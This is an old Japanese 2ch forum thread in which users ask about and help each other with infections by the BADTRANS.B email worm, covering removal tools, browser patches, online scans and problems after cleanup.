タブを選択し、「システムを復元しない」のチェックボックスにチェックします。
　Windowsを再起動します。

※ 上記の設定を行うとシステムの復元機能が無効となってます。
システムの復元機能を使用する場合は同様の手順でチェックボックス
のチェックを外しておきます。

オンラインスキャンってどうやってするんですか？
>>179のリンク先に行ってみたけどその先どうしたらいいか分かりません。
厨房質問ｽﾏｿ

"駆除ツール"を、使うとKernel32.exeって、ホルダーはあるが
中身はからっぽだよねえ。だよねえ・・・

>>200
はい。オンラインスキャン（>>179のリンク先）ではなく、
駆除ツール（FixBadtr.exeと3368Fix_BADT.EXE）を使いました。
WINDOWSのSYSTEMディレクトリに検索で引っかかったKernel32exeですが、
”ファイル”ではなく、”フォルダ”でした。
サイズも０バイトで、ファイル数も０（つまり空フォルダ）です。
その後>>179のオンラインスキャンもしてみました。
一応、大丈夫なようです。
対策としては、SP2のセキュリティーホールのパッチと、OEのメールを
プレビューしないという設定にしましたが、これで大丈夫ですか？
ノートンとか、ウイルスバスターとかも購入しておいた方がいいんですかね？

　ちょっとお聞きしたいんですけど、WEBメールで送った過去のメールが他の人に再送されてしまいます。これはウィルスによるのでしょうか??
　あと、知り合いの過去のメールもバンバン送られてくるんですけど、そのヘッダと、僕の再送されるWEBメールのヘッダを見比べると、まったく同じ経路で送られているみたいなんです。これって、何か関係あるんでしょうか。ハッキングでしょうか??

ルドルフ最強

>>201
BADTRANS。
詳細はトレンドマイクロのページ参照。
http://inet.trendmicro.co.jp/virusinfo/isp/default3.asp?VName=WORM_BADTRANS.B
IEのバッチ当ててないと見るだけでも感染するぞい。

>>205
別スレの４参照
「猛威をふるう BADTRANS.B　Re: メール （２通目） 」
http://pc.2ch.net/test/read.cgi/sec/1007075829/4

最近勝手にメディアプレイヤーが起動するメール来るんだけど詳細ｷﾎﾞﾝﾇ

>>210
ありがとう．
IE6のバッチ当てたのに，まだ
http://www.sapporoworks.ne.jp/secure/
の
http://www.sapporoworks.ne.jp/secure/003/index.html
でMedia Playerが立ち上がるよ．困ったなあ．

ちなみにメーラーは鶴亀とかかめ〜るだけど，それでも危ない？

>>207
OKと思われます。感染してなくてよかったですね。
ウイルスソフトは入れるにこしたことはないでしょう。
プロバのウイルスチェックサービス入ってるとのことだから、
感染の危険性は低いと思いますが念のため。
とか言いながら自分は入れてなかったりする・・・（ｗ

うちも来ました。ウイルスメール。んで削除の時に開いちゃいました。
でも感染している様子なし。
いちおうトレンドマイクロでオンラインスキャンしてみたけど
「ウイルスは検出しませんでした」とか言われた。
ちなみにうちはWindowsMeでOutlookExpressのバージョン５。
バージョン5.05と5.15?がヤバイって聞いたから
バージョン5だと大丈夫なのかな？

>>215
「WORM_BADTRANS.B」はウイルスコードのバグのためか不完全な
メールを送信してしまい、結果的にワームの脅威のないメールが
届く場合があることが確認されています。「WORM_BADTRANS.B」て
は添付ファイルが壊れた状態で届き、実行できません。この状態
のメールに関してはワームの脅威がないのでウイルス対策製品で
は検出されません。いずれにいたしましてもワームの危険性があ
るメールをすべて削除していただくようお願いします。

以上，ここ↓からコピペです．
http://www.trendmicro.co.jp/virusinfo/worm_badtrans_b.htm

>>216
ありがとうっ

>>208
断言はできませんが、お知り合いがウイルスに感染したのでは？
ウイルスの中には、Outlookの受信トレイに保存されているメッセージをチェックして
本文やタイトルはそのままに、自分（ウイルス）をつけて勝手に返信しまくるものが
あります。1年程前に流行ったW32.Navidadなどがその例ですね。
そのメールには変な添付ファイルついてませんでしたか？

後、考えられるのはメールサーバの障害かな。
会社での話ですが、以前取引先から突然過去のメールがバンバン届きだして
ビックリしたことがありました。
情報が少ないので自分にはこれくらいしか答えられません。スマソ。

>>212
ウイルス。
>>213
何でだろ???
IE6は標準かフルインストールしましたよね？

ちなみにOutlook以外のメーラーですが、HTMLメールの表示をするのに
IEのコンポーネントを利用してることがあるため、今回のBadtransのような
IEのセキュリィホールをつくタイプのウイルスの影響を受けることが
あります。Outlookでないからと安心しない方がいいでしょう。
詳しくはメールソフトの作者さんに確認してくださいね。

さて、別スレの情報が大変充実してきてるみたいです。
「BADTRANSに感染しちゃったかもオロオロ・・・」という人はまずこちらを
読んでみてくださいね。特に1-9。

☆猛威をふるう BADTRANS.B　Re: メール （３通目）in セキュリティ板
http://pc.2ch.net/test/read.cgi/sec/1007344514/

自分は落ちます・・・

　はい、その人からの、本文とタイトルがついているメールには添付ファイルはありません。
　それとは別に、件名REで本文無しの40Kb添付ファイルつきのやつも届きます。これは間違い
なくBADTRANSだと思うんですが…。

>ウイルスの中には、Outlookの受信トレイに保存されているメッセージをチェックして
>本文やタイトルはそのままに、自分（ウイルス）をつけて勝手に返信しまくるものが
>あります。1年程前に流行ったW32.Navidadなどがその例ですね。
　この場合、差出人は誰になるのでしょうか。最初にそのメールを書いた人でしょうか、
それとも、ウィルスに犯された状態でそれを受信し、そのメールをばらまいた人でしょう
か??
　ちなみに、私の過去のメールも、その人の過去のメールも、同じサーバーを経由してきてい
て、普段正常にメールのやり取りをしているのとは違う経路です(私→友人と友人→私の経路
も違います)。
　WEBメールのサーバーに問い合わせてみましたが、「サーバーがウィルスに犯されることは基
本的にありません」とのことでした。

しばらく来ないから、もう沈静化したのかと思ったら来てました。
ＷＥＢメールからわざとアウトルックに落としたら、即時隔離。
From: "ﾘｺ・" <*********@d6.dion.ne.jp>
Subject: Re:　　ファイル名　Me_nude.M.scr
WORM_BADTRANS.B でした。ヌードってのはそそられますです。

200さんいろいろありがとうございます．
スレ両方チェックするのも大変なので
200さん推奨のこちら↓に集団移住しませんか？

☆猛威をふるう BADTRANS.B　Re: メール （３通目）in セキュリティ板
http://pc.2ch.net/test/read.cgi/sec/1007344514/

sage忘れた．欝だ

BADTRANS.Bメール累計200通突破！

sageってこうやるのか？2CH初心者なんでよくわからん（ｗ

201さん誘導ありがとう。そろそろボロが出そうになってたんで助かりましたです。
208さん中途半端な回答になってしまってスマソ。自分はネットワーク詳しくないんで
これ以上は答えられそうにないっす。セキュリティ板あたりで適当なスレ見つけて
聞いてもらった方が的確な回答が得られるかも。早く解決するといいですね、って無責任か？

>>223
そこすごくためになりますよね。

昨日、感染したから駆除したんだけど…その後ちょっとおかしくなったようで…。
なんか知らんが、楽天市場等のメールを開き、文書内のＵＲＬを開こうとした所、
開けない！他のお店からのやつなんかのメールマガジン等も同様です。
エクスプローラでＣドライブが開いてしまいます。
これはメール内のURLだけの現象です。誰か原因わかりませんか？

お陰様で私のスレ229まで行きました。自己記録2番目です。ありがとうございました（涙）

age

>>228
IEイヤになってNetscape入れたでしょ？
ほれ！

「メールのURLクリックでCドライブ表示？」
http://pcgaz.nikkeibp.co.jp/qa/helpc/15.shtml

＞２３１

もとからはいってたので入れてないです。
でも、昨日５から５．５にﾊﾞｰｿﾞﾝうｐしてみたら、直りました
どうもありがとうございました。